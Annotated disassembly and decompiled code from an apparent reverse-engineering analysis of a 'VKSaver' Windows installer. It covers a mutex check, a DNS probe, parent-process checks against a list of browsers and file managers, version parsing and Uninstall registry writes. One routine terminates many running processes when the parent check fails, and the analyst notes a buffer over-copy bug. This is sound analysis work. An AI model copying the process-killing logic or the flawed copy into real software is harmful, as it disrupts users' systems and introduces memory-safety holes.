; sub_4064e0 — installer entry routine (ret 0x10 -> four stack arguments, i.e.
; a wWinMain-shaped function; TODO confirm from the caller).
; Visible behaviour, in order:
;   - single-instance check via the named mutex "VKSaverInstallerMtx"; an
;     existing instance is brought to the foreground and this one returns 1;
;   - WSAStartup + GetAddrInfoW("audiovkontakte.ru") used as a reachability
;     probe with a Retry/Cancel message box (Cancel returns 2);
;   - Toolhelp walk to find this process' own entry and save its parent PID;
;   - reads the module's own version resource and stores the version parts in
;     globals 0x4B14FC/0x4B1500/0x4B1504/0x4B1508 (later formatted into the
;     Uninstall key's DisplayVersion by sub_401240).
; The listing is truncated while arguments for a wsprintfW call are pushed.
sub_4064e0() {
push ebp
mov ebp, esp
and esp, 0xFFFFFFF0
mov eax, 0x1A68
call __alloca_probe()
; /GS stack cookie: [0x46F000] ^ esp saved at [esp+0x1A64]
mov eax, [0x46F000]
xor eax, esp
mov [esp+0x1A64], eax
push esi
push edi
; OpenMutexW(0x100000 = SYNCHRONIZE, FALSE, "VKSaverInstallerMtx") -> [0x4B14F4]
push "VKSaverInstallerMtx"
push 0x00
push 0x100000
call [kernel32.OpenMutexW]
mov [0x4B14F4], eax
test eax, eax
jz .2
; mutex exists: another installer is running — surface its window and leave
push eax
call [kernel32.CloseHandle]
push 0x00
push "VKSaverInstallWnd"
call [user32.FindWindowW]
mov esi, eax
test esi, esi
jz .1
push 0x01
push esi
call [user32.ShowWindow]
push esi
call [user32.SetForegroundWindow]
.1:
; return 1 (already running)
mov eax, 0x01
pop edi
pop esi
mov ecx, [esp+0x1A64]
xor ecx, esp
call sub_406beb()
mov esp, ebp
pop ebp
ret 0x10
.2:
; CreateMutexW(NULL, TRUE, "VKSaverInstallerMtx") -> [0x4B14F4]
push "VKSaverInstallerMtx"
push 0x01
push 0x00
call [kernel32.CreateMutexW]
mov [0x4B14F4], eax
; WSAStartup(0x202, &wsaData); failure jumps to the (unlisted) exit path .29
lea eax, [esp+0x4D8]
push eax
push 0x202
call [ws2_32.WSAStartup]
test eax, eax
jnz .29
; GetAddrInfoW("audiovkontakte.ru", <service string at 0x46D578>, &hints, &result)
; hints zeroed with xmm0, then ai_family = 2 (AF_INET), ai_socktype = 2
; (SOCK_DGRAM), ai_protocol = 0x11 (UDP). The result is only freed below, so
; this acts as a connectivity/DNS probe rather than a real connection.
mov esi, [ws2_32.GetAddrInfoW]
lea eax, [esp+0x20]
push eax
lea eax, [esp+0x34]
push eax
xorps xmm0, xmm0
movdqa [esp+0x38], xmm0
push 0x46D578
push "audiovkontakte.ru"
movdqa [esp+0x50], xmm0
mov dword ptr [esp+0x44], 0x02
mov dword ptr [esp+0x48], 0x02
mov dword ptr [esp+0x4C], 0x11
call esi
test eax, eax
jz .4
jmp .3
.3:
; resolution failed: MessageBoxW(0, text@0x46D5D8, caption@0x46D5A4,
; 0x25 = MB_RETRYCANCEL | MB_ICONQUESTION); IDCANCEL (2) -> return 2, else retry
push 0x25
push 0x46D5A4
push 0x46D5D8
push 0x00
call [user32.MessageBoxW]
cmp eax, 0x02
jz .6
lea eax, [esp+0x20]
push eax
lea eax, [esp+0x34]
push eax
xorps xmm0, xmm0
movdqa [esp+0x38], xmm0
push 0x46D578
push "audiovkontakte.ru"
movdqa [esp+0x50], xmm0
mov dword ptr [esp+0x44], 0x02
mov dword ptr [esp+0x48], 0x02
mov dword ptr [esp+0x4C], 0x11
call esi
test eax, eax
jnz .3
.4:
push [esp+0x20]
call [ws2_32.FreeAddrInfoW]
; CreateToolhelp32Snapshot(2 = TH32CS_SNAPPROCESS, 0) -> edi
push 0x00
push 0x02
call [kernel32.CreateToolhelp32Snapshot]
; PROCESSENTRY32W at [esp+0x2A8]: memset(0, 0x228) then dwSize = 0x22C
push 0x228
mov edi, eax
lea eax, [esp+0x2B0]
push 0x00
push eax
call _memset()
add esp, 0x0C
mov dword ptr [esp+0x2A8], 0x22C
call [kernel32.GetCurrentProcessId]
mov esi, eax
lea eax, [esp+0x2A8]
push eax
push edi
; [esp+0x1C] defaults to our own PID; replaced by the parent PID at .7
mov [esp+0x1C], esi
mov dword ptr [esp+0x24], 0x00
call [kernel32.Process32FirstW]
test eax, eax
jz .8
lea ecx, [ecx]
.5:
; entry.th32ProcessID (+0x08) == GetCurrentProcessId() ?
cmp [esp+0x2B0], esi
jz .7
lea eax, [esp+0x2A8]
push eax
push edi
call [kernel32.Process32NextW]
test eax, eax
jnz .5
jmp .8
.6:
; user pressed Cancel on the connectivity prompt: return 2
mov eax, 0x02
pop edi
pop esi
mov ecx, [esp+0x1A64]
xor ecx, esp
call sub_406beb()
mov esp, ebp
pop ebp
ret 0x10
.7:
; save entry.th32ParentProcessID (+0x18) — consumed later (see decompiled
; sub_4064e0, where it is presumably what reaches sub_406090 in ecx)
mov eax, [esp+0x2C0]
mov [esp+0x1C], eax
.8:
push edi
call [kernel32.CloseHandle]
; GetModuleFileNameW(NULL, [esp+0x66C], 0x200) — own image path
push 0x200
lea eax, [esp+0x66C]
push eax
push 0x00
call [kernel32.GetModuleFileNameW]
; GetFileVersionInfoSizeW(path, &handle) -> esi; buffer = calloc(1, esi + 4) -> edi
lea eax, [esp+0x54]
push eax
lea eax, [esp+0x66C]
push eax
call [version.GetFileVersionInfoSizeW]
mov esi, eax
lea ecx, [esi+0x04]
push ecx
push 0x01
call _calloc()
add esp, 0x08
mov edi, eax
push edi
push esi
push 0x00
lea eax, [esp+0x674]
push eax
call [version.GetFileVersionInfoW]
; VerQueryValueW(edi, <subblock string at 0x46B11C>, &pBlock, &cb)
lea eax, [esp+0x2C]
push eax
lea eax, [esp+0x28]
push eax
push 0x46B11C
push edi
mov dword ptr [esp+0x34], 0x00
call [version.VerQueryValueW]
; esi = returned block if non-NULL, else the calloc buffer (cmovnz)
mov eax, [esp+0x24]
mov esi, [esp+0x2C]
test eax, eax
cmovnz esi, eax
; Treating esi as VS_FIXEDFILEINFO: +0x08 dwFileVersionMS, +0x0C dwFileVersionLS.
movzx eax, word ptr [esi+0x0C]
mov [esp+0x28], eax
; [0x4B14FC] = HIWORD(dwFileVersionMS)  (major)
movzx eax, word ptr [esi+0x0A]
mov [0x4B14FC], eax
; [0x4B1500] = LOWORD(dwFileVersionMS)  (minor)
movzx eax, word ptr [esi+0x08]
mov [0x4B1500], eax
; [0x4B1504] = (LS>>25)*10000 + ((LS>>21)&0xF)*100 + ((LS>>16)&0x1F):
; a packed year/month/day field from the high word of dwFileVersionLS
mov edx, [esi+0x0C]
mov ecx, edx
shr ecx, 0x19
imul ecx, ecx, 0x64
mov eax, edx
shr eax, 0x15
and eax, 0x0F
add ecx, eax
imul ecx, ecx, 0x64
shr edx, 0x10
and edx, 0x1F
add ecx, edx
mov [0x4B1504], ecx
; [0x4B1508] = LOWORD(dwFileVersionLS)
movzx eax, word ptr [esi+0x0C]
mov [0x4B1508], eax
; push wsprintfW operands (right-to-left): year+2000 (0x7D0), month, day,
; LOWORD(LS), LOWORD(MS), HIWORD(MS); the call itself is past the truncation
mov ecx, [esi+0x0C]
mov edx, [esi+0x08]
mov eax, ecx
shr eax, 0x19
add eax, 0x7D0
push eax
mov eax, ecx
shr eax, 0x15
and eax, 0x0F
push eax
mov eax, ecx
shr eax, 0x10
and eax, 0x1F
push eax
movzx eax, cx
push eax
movzx eax, dx
push eax
shr edx, 0x10
push edx
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * sub_4064e0 — decompiled view of the installer entry routine (see the asm
 * listing above for the faithful call arguments; the decompiler lost most of
 * them here, so the (*api)() calls below appear argument-less).
 * Phases visible before the truncation:
 *  - single-instance mutex "VKSaverInstallerMtx" / window "VKSaverInstallWnd";
 *  - DNS reachability probe of "audiovkontakte.ru" with Retry/Cancel prompt;
 *  - parent-PID lookup via Toolhelp, then own version-resource parsing into
 *    the globals 0x4b14fc/0x4b1500/0x4b1504/0x4b1508;
 *  - if the parent-process check (sub_406090) or sub_406240 fails, a second
 *    Toolhelp pass collects up to 0x1ff PIDs and terminates each of them;
 *  - command-line switches (via _wcsstr) drive the flag 0x4b14ba and the
 *    global 0x4b1044, and hosts with GetVersion major < 6 are refused.
 */
void sub_4064e0(void)
{
code *pcVar1;
int32_t iVar2;
char cVar3;
uint8_t uVar4;
int32_t iVar5;
int32_t iVar6;
int32_t iVar7;
int16_t *piVar8;
int16_t *piVar9;
undefined *puVar10;
uint32_t uVar11;
uint32_t uVar12;
int32_t in_stack_00000264;
int16_t in_stack_000005d4;
undefined *puStack_58;
undefined4 uStack_54;
undefined4 uStack_50;
undefined4 uStack_4c;
undefined4 uStack_48;
int32_t iStack_44;
undefined *puStack_40;
undefined *puStack_3c;
int32_t iStack_38;
undefined **ppuStack_34;
undefined4 uStack_30;
undefined4 uStack_2c;
undefined auStack_28 [8];
undefined8 uStack_20;
undefined auStack_8 [4];
__alloca_probe();
/* OpenMutexW(0x100000 = SYNCHRONIZE, 0, "VKSaverInstallerMtx") -> global 0x4b14f4 */
uStack_20._0_4_ = 0;
uStack_20._4_4_ = "VKSaverInstallerMtx";
auStack_28 = 0x10000000000000;
auStack_28._0_4_ = 0x406512;
004b14f4 = (*kernel32.OpenMutexW)();
if (004b14f4 != 0) {
/* already running: close our handle, raise the existing window, return */
auStack_28._0_4_ = 004b14f4;
uStack_2c = 0x406522;
(*kernel32.CloseHandle)();
uStack_2c = 0;
uStack_30 = "VKSaverInstallWnd";
ppuStack_34 = 0x40652f;
iVar5 = (*user32.FindWindowW)();
if (iVar5 != 0) {
ppuStack_34 = 0x1; /* SW_SHOWNORMAL */
puStack_3c = 0x40653e;
iStack_38 = iVar5;
(*user32.ShowWindow)();
puStack_40 = 0x406545;
puStack_3c = iVar5;
(*user32.SetForegroundWindow)();
}
uStack_2c = 0x40655a;
sub_406beb(); /* security-cookie check epilogue; asm returns 1 here */
return;
}
/* CreateMutexW(0, TRUE, "VKSaverInstallerMtx") */
auStack_28._0_4_ = "VKSaverInstallerMtx";
uStack_2c = 1;
uStack_30 = 0;
ppuStack_34 = 0x40656f;
004b14f4 = (*kernel32.CreateMutexW)();
/* WSAStartup(0x202, &wsaData) */
ppuStack_34 = &stack0x000004a8;
iStack_38 = 0x202;
puStack_3c = 0x406587;
iVar5 = (*ws2_32.WSAStartup)();
pcVar1 = ws2_32.GetAddrInfoW;
if (iVar5 != 0) goto code_r0x00406bd3;
/* GetAddrInfoW("audiovkontakte.ru", 0x46d578, &hints{AF_INET, SOCK_DGRAM, UDP}, &res) */
puStack_3c = &stack0xffffffe8;
puStack_40 = auStack_8;
iStack_44 = 0x46d578;
uStack_48 = "audiovkontakte.ru";
uStack_4c = 0x4065d2;
iVar5 = (*ws2_32.GetAddrInfoW)();
/* retry loop: MessageBoxW(0, 0x46d5d8, 0x46d5a4, 0x25 = MB_RETRYCANCEL|MB_ICONQUESTION) */
while (iVar5 != 0) {
uStack_4c = 0x25;
uStack_50 = 0x46d5a4;
uStack_54 = 0x46d5d8;
puStack_58 = 0x0;
iVar5 = (*user32.MessageBoxW)();
if (iVar5 == 2) { /* IDCANCEL -> asm returns 2 */
uStack_54 = 0x4066d3;
sub_406beb();
return;
}
/* re-issue the same GetAddrInfoW with freshly zeroed hints */
uStack_20._0_4_ = 2;
auStack_28 = 0x200000000;
uStack_20._4_4_ = 0x11;
iVar5 = (*pcVar1)();
}
/* FreeAddrInfoW(res) — the addresses are never used in the visible code */
uStack_4c = auStack_28._0_4_;
uStack_50 = 0x406648;
(*ws2_32.FreeAddrInfoW)();
/* CreateToolhelp32Snapshot(2 = TH32CS_SNAPPROCESS, 0); PROCESSENTRY32W dwSize = 0x22c */
uStack_50 = 0;
uStack_54 = 2;
puStack_58 = 0x406652;
(*kernel32.CreateToolhelp32Snapshot)();
puStack_58 = 0x228;
_memset();
iVar5 = 0x22c;
puStack_58 = 0x40667c;
iVar6 = (*kernel32.GetCurrentProcessId)();
puStack_58 = &stack0x00000254;
iStack_38 = 0;
puStack_40 = iVar6;
iVar7 = (*kernel32.Process32FirstW)();
/* Walk until entry.th32ProcessID == own PID and keep entry.th32ParentProcessID;
 * the asm (.5/.7) is clearer than this decompiled loop condition. */
while ((iVar2 = puStack_40, iVar7 != 0 && (iVar2 = in_stack_00000264, iVar5 != iVar6))) {
iVar7 = (*kernel32.Process32NextW)();
}
puStack_40 = iVar2;
(*kernel32.CloseHandle)();
/* own image path -> version resource: GetModuleFileNameW / GetFileVersionInfoSizeW /
 * calloc / GetFileVersionInfoW / VerQueryValueW(.., 0x46b11c, ..) */
(*kernel32.GetModuleFileNameW)();
(*version.GetFileVersionInfoSizeW)();
iVar5 = _calloc();
(*version.GetFileVersionInfoW)();
(*version.VerQueryValueW)();
/* rendering of the asm "cmovnz esi, eax": use the VerQueryValueW output
 * block when non-NULL, else fall back to the calloc buffer */
puVar10 = &stack0x00000608;
if (&stack0xffffffe8 != 0x0) {
puVar10 = &stack0xffffffe8;
}
/* VS_FIXEDFILEINFO: +8 dwFileVersionMS, +0xc dwFileVersionLS */
004b14fc = *(puVar10 + 10); /* HIWORD(dwFileVersionMS) */
004b1500 = *(puVar10 + 8);  /* LOWORD(dwFileVersionMS) */
uVar11 = *(puVar10 + 0xc);
/* packed year(7b)/month(4b)/day(5b) from the high word of dwFileVersionLS */
004b1504 = ((uVar11 >> 0x19) * 100 + (uVar11 >> 0x15 & 0xf)) * 100 + (uVar11 >> 0x10 & 0x1f);
004b1508 = *(puVar10 + 0xc); /* LOWORD(dwFileVersionLS) */
(*user32.wsprintfW)();
/* replace every '.' (0x2e) in the formatted wide string with NUL */
piVar8 = &stack0x000005d4;
while (in_stack_000005d4 != 0) {
if (*piVar8 == 0x2e) {
*piVar8 = 0;
}
piVar8 = piVar8 + 1;
in_stack_000005d4 = *piVar8;
}
/* sub_406090 (listed below) decides whether the parent process image is one of
 * an allowed set of launchers; its ecx argument is presumably the parent PID
 * saved above — TODO confirm. If it or sub_406240 fails, running processes
 * are collected and terminated. */
cVar3 = sub_406090();
if (((cVar3 == '\0') || (cVar3 = sub_406240(), cVar3 == '\0')) && (iVar5 != 0)) {
sub_403120();
uVar11 = 1;
(*kernel32.CreateToolhelp32Snapshot)();
_memset();
iStack_44 = 0x22c;
iVar5 = (*kernel32.Process32FirstW)();
while (iVar5 != 0) {
/* NOTE(review): this filter is decompiler noise (stack-address compare);
 * the real selection criterion is not recoverable from this view. */
if ((iStack_44 != 0x46b11c) && (&puStack_58 == ppuStack_34)) {
*(&stack0x000009c4 + uVar11 * 4) = iStack_44;
uVar11 = uVar11 + 1;
if (0x1ff < uVar11) break; /* PID list capped at 0x1ff entries */
}
iVar5 = (*kernel32.Process32NextW)();
}
(*kernel32.CloseHandle)();
/* OpenProcess / TerminateProcess / CloseHandle for each collected PID */
uVar12 = 0;
if (uVar11 != 0) {
do {
iVar5 = (*kernel32.OpenProcess)();
if (iVar5 != -1) {
(*kernel32.TerminateProcess)();
(*kernel32.CloseHandle)();
}
uVar12 = uVar12 + 1;
} while (uVar12 < uVar11);
}
}
(*kernel32.GetCommandLineW)();
[0x0x4b2010] = 0x11;
004b150c = (*kernel32.GetProcessHeap)();
(*ole32.CoInitializeEx)();
(*shell32.SHGetSpecialFolderPathW)();
/* inline wcslen of the wide string at 0x4b1e10; append '\\' if it does not
 * already end in one (0x5c), then build the install paths */
piVar8 = 0x4b1e10;
do {
piVar9 = piVar8;
piVar8 = piVar9 + 1;
} while (*piVar9 != 0);
if (*((piVar9 + -0x258f08 >> 1) * 2 + 0x4b1e0e) != 0x5c) {
_wcscat_s();
}
_wcscat_s();
(*kernel32.CreateDirectoryW)();
(*kernel32.GetShortPathNameW)();
_wcscat_s();
_wcscpy_s();
_wcscpy_s();
_wcscpy_s();
_wcscat_s();
_wcscat_s();
_wcscat_s();
_wcscat_s();
_wcscat_s();
/* command-line switch present -> flag 0x4b14ba (triggers sub_4029b0 cleanup
 * from sub_402ce0); the searched substring is not visible here */
iVar5 = _wcsstr();
if (iVar5 != 0) {
004b14ba = 1;
}
iVar5 = _wcsstr();
if (iVar5 == 0) {
iVar5 = sub_406290();
if (iVar5 == 0) {
/* GetVersion() low byte < 6: pre-Vista host is refused with a message box */
uVar4 = (*kernel32.GetVersion)();
if (uVar4 < 6) {
(*user32.MessageBoxW)();
goto code_r0x00406bce;
}
[0x0x4b1044] = 100;
}
else {
[0x0x4b1044] = 0;
/* FindFirstFileW on an existing file; on hit, sub_401060 and a version
 * query decide whether 0x4b1044 becomes -1 (meaning not visible here) */
iVar5 = (*kernel32.FindFirstFileW)();
if (iVar5 != -1) {
(*kernel32.FindClose)();
cVar3 = sub_401060();
if (cVar3 != '\0') {
(*version.GetFileVersionInfoW)();
(*version.VerQueryValueW)();
if ([0x0x14] == 0) {
[0x0x4b1044] = 0xffffffff;
/* listing truncated */
0x406090 sub_406090 str 13 api 2 imm 8 Unknown
; sub_406090(ecx = PID) -> al
; Looks up the image name of the process whose id is in ecx via
; NtQuerySystemInformation(SystemProcessInformation = 5) and checks it against
; a fixed list of launcher/browser/file-manager names using sub_406ed0.
; Return value (from the exit paths below):
;   1  - ecx == 0, GetProcAddress failed, or the name matched one of the list
;        entries through "totalcmd.exe" (sub_406ed0 == 0 read as "equal");
;   0  - calloc failed or no image name was found;
;   setz of the final "totalcmd64.exe" comparison otherwise.
; The caller (sub_4064e0) treats 0 as the trigger for its process-termination
; pass, so this is effectively an "is the parent a known launcher" gate.
; Struct offsets used (+0x00 NextEntryOffset, +0x38 ImageName.Length,
; +0x3C ImageName.Buffer, +0x44 UniqueProcessId) match the 32-bit
; SYSTEM_PROCESS_INFORMATION layout.
sub_406090() {
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ecx
test esi, esi
jnz .1
; PID 0 -> return 1
mov al, 0x01
pop esi
mov esp, ebp
pop ebp
ret
.1:
push edi
; edi = calloc(1, 0xFA000) — 1000 KiB buffer for the process list
push 0xFA000
push 0x01
call _calloc()
mov edi, eax
add esp, 0x08
test edi, edi
jz .5
; GetProcAddress(GetModuleHandleW("ntdll.dll"), "NtQuerySystemInformation")
push "NtQuerySystemInformation"
push "ntdll.dll"
call [kernel32.GetModuleHandleW]
push eax
call [kernel32.GetProcAddress]
test eax, eax
jz .7
; NtQuerySystemInformation(5, edi, 0xFA000, &[ebp-4]); the status is not checked
lea ecx, [ebp-0x04]
push ecx
push 0xFA000
push edi
push 0x05
call eax
cmp dword ptr [edi], 0x00
mov ecx, edi
jz .4
lea esp, [esp]
.2:
; entry.UniqueProcessId == esi ?
cmp [ecx+0x44], esi
jz .3
; ecx += entry.NextEntryOffset; a zero offset ends the list
add ecx, [ecx]
cmp dword ptr [ecx], 0x00
jnz .2
jmp .4
.3:
; wcsncpy(0x470C38, ImageName.Buffer, ImageName.Length)
; ImageName.Length is a byte count but is passed as the wchar count, so up to
; twice the name is copied into the global buffer at 0x470C38.
movzx eax, word ptr [ecx+0x38]
push eax
push [ecx+0x3C]
push 0x470C38
call _wcsncpy()
add esp, 0x0C
.4:
push edi
call _free()
add esp, 0x04
; empty name buffer -> return 0
cmp word ptr [0x470C38], 0x00
jnz .6
.5:
pop edi
xor al, al
pop esi
mov esp, ebp
pop ebp
ret
.6:
; sub_406ed0(0x470C38, name): a zero result is treated as a match (jz .7 -> 1)
push "vksaver.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "explorer.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "iexplore.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "firefox.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "opera.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "chrome.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "safari.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "browser.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "far.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jz .7
push "totalcmd.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
jnz .8
.7:
; matched (or GetProcAddress failed) -> return 1
pop edi
mov al, 0x01
pop esi
mov esp, ebp
pop ebp
ret
.8:
; last candidate: return (sub_406ed0(0x470C38, "totalcmd64.exe") == 0)
push "totalcmd64.exe"
push 0x470C38
call sub_406ed0()
add esp, 0x08
test eax, eax
pop edi
setz al
pop esi
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * sub_406090(param_1 = process id) -> bool
 * Resolves the image name of process param_1 from NtQuerySystemInformation
 * (class 5, SystemProcessInformation) into the global buffer at 0x470c38 and
 * returns true when that name equals one of the listed launcher/browser/file
 * manager executables (sub_406ed0 returning 0 is treated as "equal").
 * Edge cases, per the asm: param_1 == 0 -> true; calloc failure or an empty
 * image name -> false; a missing NtQuerySystemInformation export -> true.
 * NOTE: the decompiler mis-assigned the two GetModuleHandleW/GetProcAddress
 * arguments below — the asm is GetModuleHandleW("ntdll.dll") followed by
 * GetProcAddress(hModule, "NtQuerySystemInformation").
 */
bool __fastcall sub_406090(int32_t param_1)
{
int32_t *piVar1;
undefined4 uVar2;
code *pcVar3;
int32_t iVar4;
int32_t *piVar5;
int32_t iStack_8;
if (param_1 == 0) {
return true;
}
iStack_8 = param_1;
piVar1 = _calloc(1, 0xfa000); /* 1000 KiB buffer for the process list */
if (piVar1 == 0x0) {
return false;
}
uVar2 = (*kernel32.GetModuleHandleW)("ntdll.dll", "NtQuerySystemInformation");
pcVar3 = (*kernel32.GetProcAddress)(uVar2);
if (pcVar3 != 0x0) {
/* NtQuerySystemInformation(5, buf, 0xfa000, &returnLength); status ignored */
(*pcVar3)(5, piVar1, 0xfa000, &iStack_8);
iVar4 = *piVar1;
piVar5 = piVar1;
/* walk SYSTEM_PROCESS_INFORMATION entries: [0] NextEntryOffset (bytes),
 * [0x11] UniqueProcessId (+0x44), [0xf] ImageName.Buffer (+0x3c),
 * +0xe*4 = +0x38 ImageName.Length */
while (iVar4 != 0) {
if (piVar5[0x11] == param_1) {
/* ImageName.Length is a byte count but is used as the wchar count here,
 * so the copy can run to twice the name's length */
_wcsncpy(0x470c38, piVar5[0xf], *(piVar5 + 0xe));
break;
}
piVar5 = piVar5 + *piVar5;
iVar4 = *piVar5;
}
_free(piVar1);
if ([0x0x470c38] == 0) {
return false;
}
/* every comparison that yields 0 short-circuits to "return true" */
iVar4 = sub_406ed0(0x470c38, "vksaver.exe");
if ((((((iVar4 != 0) && (iVar4 = sub_406ed0(0x470c38, "explorer.exe"), iVar4 != 0)) &&
(iVar4 = sub_406ed0(0x470c38, "iexplore.exe"), iVar4 != 0)) &&
((iVar4 = sub_406ed0(0x470c38, "firefox.exe"), iVar4 != 0 &&
(iVar4 = sub_406ed0(0x470c38, "opera.exe"), iVar4 != 0)))) &&
((iVar4 = sub_406ed0(0x470c38, "chrome.exe"), iVar4 != 0 &&
((iVar4 = sub_406ed0(0x470c38, "safari.exe"), iVar4 != 0 &&
(iVar4 = sub_406ed0(0x470c38, "browser.exe"), iVar4 != 0)))))) &&
((iVar4 = sub_406ed0(0x470c38, "far.exe"), iVar4 != 0 && (iVar4 = sub_406ed0(0x470c38, "totalcmd.exe"), iVar4 != 0))
)) {
iVar4 = sub_406ed0(0x470c38, "totalcmd64.exe");
return iVar4 == 0;
}
}
return true;
}
0x401240 sub_401240 str 10 api 3 imm 9 Unknown
; sub_401240() -> al
; Registers the Add/Remove Programs entry: creates
; HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\VKSaver
; (samDesired 0x20006 = KEY_WRITE) and writes REG_SZ values
; DisplayName, DisplayIcon, UninstallString, Publisher, DisplayVersion.
; Returns 1 when every RegSetValueExW succeeded, 0 otherwise.
; Each value goes through the same pattern: wsprintfW into [ebp-0x204]
; (a 0x200-byte wide buffer), inline wcslen, ecx = (len+1)*2 = cbData, then a
; /GS range check (eax = 2*cbData must stay below 0x200) before writing a NUL
; at wchar index cbData and calling RegSetValueExW(hKey, name, 0, REG_SZ, buf, cbData).
sub_401240() {
push ebp
mov ebp, esp
sub esp, 0x208
; /GS stack cookie
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
; RegCreateKeyExW(HKLM, "...\\Uninstall\\VKSaver", 0, 0, 0, 0x20006, 0, &[ebp-0x208], 0)
push 0x00
lea eax, [ebp-0x208]
push eax
push 0x00
push 0x20006
push 0x00
push 0x00
push 0x00
push "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\VKSaver"
push 0x80000002
call [advapi32.RegCreateKeyExW]
test eax, eax
jz .1
; key creation failed -> return 0
xor al, al
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.1:
push edi
mov edi, [user32.wsprintfW]
; DisplayName = "VKSaver"
lea eax, [ebp-0x204]
push "VKSaver"
push eax
call edi
lea ecx, [ebp-0x204]
add esp, 0x08
lea edx, [ecx+0x02]
mov edi, edi
.2:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .2
sub ecx, edx
sar ecx, 0x01
lea ecx, [ecx*2+0x02]
lea eax, [ecx+ecx*1]
cmp eax, 0x200
jnb .10
push esi
mov esi, [advapi32.RegSetValueExW]
xor edx, edx
push ecx
mov [ebp+eax*1-0x204], dx
lea eax, [ebp-0x204]
push eax
push 0x01
push edx
push "DisplayName"
push [ebp-0x208]
call esi
test eax, eax
jnz .6
; DisplayIcon = "\"<path at 0x4B1A10>\""
push 0x4B1A10
lea eax, [ebp-0x204]
push "\"%s\""
push eax
call edi
lea ecx, [ebp-0x204]
add esp, 0x0C
lea edx, [ecx+0x02]
.3:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .3
sub ecx, edx
sar ecx, 0x01
lea ecx, [ecx*2+0x02]
lea eax, [ecx+ecx*1]
cmp eax, 0x200
jnb .10
xor edx, edx
push ecx
mov [ebp+eax*1-0x204], dx
lea eax, [ebp-0x204]
push eax
push 0x01
push edx
push "DisplayIcon"
push [ebp-0x208]
call esi
test eax, eax
jnz .6
; UninstallString = "\"<path at 0x4B1A10>\" -uninstall"
push 0x4B1A10
lea eax, [ebp-0x204]
push "\"%s\" -uninstall"
push eax
call edi
lea ecx, [ebp-0x204]
add esp, 0x0C
lea edx, [ecx+0x02]
.4:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .4
sub ecx, edx
sar ecx, 0x01
lea ecx, [ecx*2+0x02]
lea eax, [ecx+ecx*1]
cmp eax, 0x200
jnb .10
xor edx, edx
push ecx
mov [ebp+eax*1-0x204], dx
lea eax, [ebp-0x204]
push eax
push 0x01
push edx
push "UninstallString"
push [ebp-0x208]
call esi
test eax, eax
jnz .6
; Publisher = wsprintfW(<format at 0x46AFBC>, 0x4B1A10) — format string not resolved
push 0x4B1A10
lea eax, [ebp-0x204]
push 0x46AFBC
push eax
call edi
lea ecx, [ebp-0x204]
add esp, 0x0C
lea edx, [ecx+0x02]
lea ebx, [ebx]
.5:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .5
sub ecx, edx
sar ecx, 0x01
lea ecx, [ecx*2+0x02]
lea eax, [ecx+ecx*1]
cmp eax, 0x200
jnb .10
xor edx, edx
push ecx
mov [ebp+eax*1-0x204], dx
lea eax, [ebp-0x204]
push eax
push 0x01
push edx
push "Publisher"
push [ebp-0x208]
call esi
test eax, eax
jz .8
.6:
; a RegSetValueExW failed: close the key and return 0
push [ebp-0x208]
.7:
call [advapi32.RegCloseKey]
pop esi
xor al, al
pop edi
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.8:
; DisplayVersion = "%d.%d.%d.%d" from the globals filled by sub_4064e0:
; [0x4B14FC] major, [0x4B1500] minor, [0x4B1504] packed date, [0x4B1508] build
push [0x4B1508]
lea eax, [ebp-0x204]
push [0x4B1504]
push [0x4B1500]
push [0x4B14FC]
push "%d.%d.%d.%d"
push eax
call edi
lea ecx, [ebp-0x204]
add esp, 0x18
lea edx, [ecx+0x02]
lea ebx, [ebx]
.9:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .9
sub ecx, edx
sar ecx, 0x01
lea ecx, [ecx*2+0x02]
lea eax, [ecx+ecx*1]
cmp eax, 0x200
jnb .10
xor edx, edx
push ecx
mov [ebp+eax*1-0x204], dx
lea eax, [ebp-0x204]
push eax
push 0x01
push edx
push "DisplayVersion"
push [ebp-0x208]
call esi
push [ebp-0x208]
test eax, eax
jnz .7
; all values written: close the key and return 1
call [advapi32.RegCloseKey]
mov ecx, [ebp-0x04]
pop esi
xor ecx, ebp
mov al, 0x01
pop edi
call sub_406beb()
mov esp, ebp
pop ebp
ret
.10:
; MSVC /GS range-check failure (buffer index >= 0x200)
call ___report_rangecheckfailure()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * sub_401240 — writes the Add/Remove Programs entry under
 * HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\VKSaver
 * (REG_SZ values DisplayName, DisplayIcon, UninstallString, Publisher,
 * DisplayVersion). The asm returns al = 1 on full success and 0 on any
 * failure; the decompiler rendered both as plain returns.
 * Per value the code formats into iStack_208 (a 0x200-byte wide buffer),
 * measures it with an inline wcslen, derives cbData = (len+1)*2 and runs a
 * /GS range check (2*cbData < 0x200) before storing a NUL and calling
 * RegSetValueExW(hKey, name, 0, REG_SZ, buf, cbData). The "- auStack_206"
 * pointer arithmetic is the decompiler's rendering of that length computation.
 */
void sub_401240(void)
{
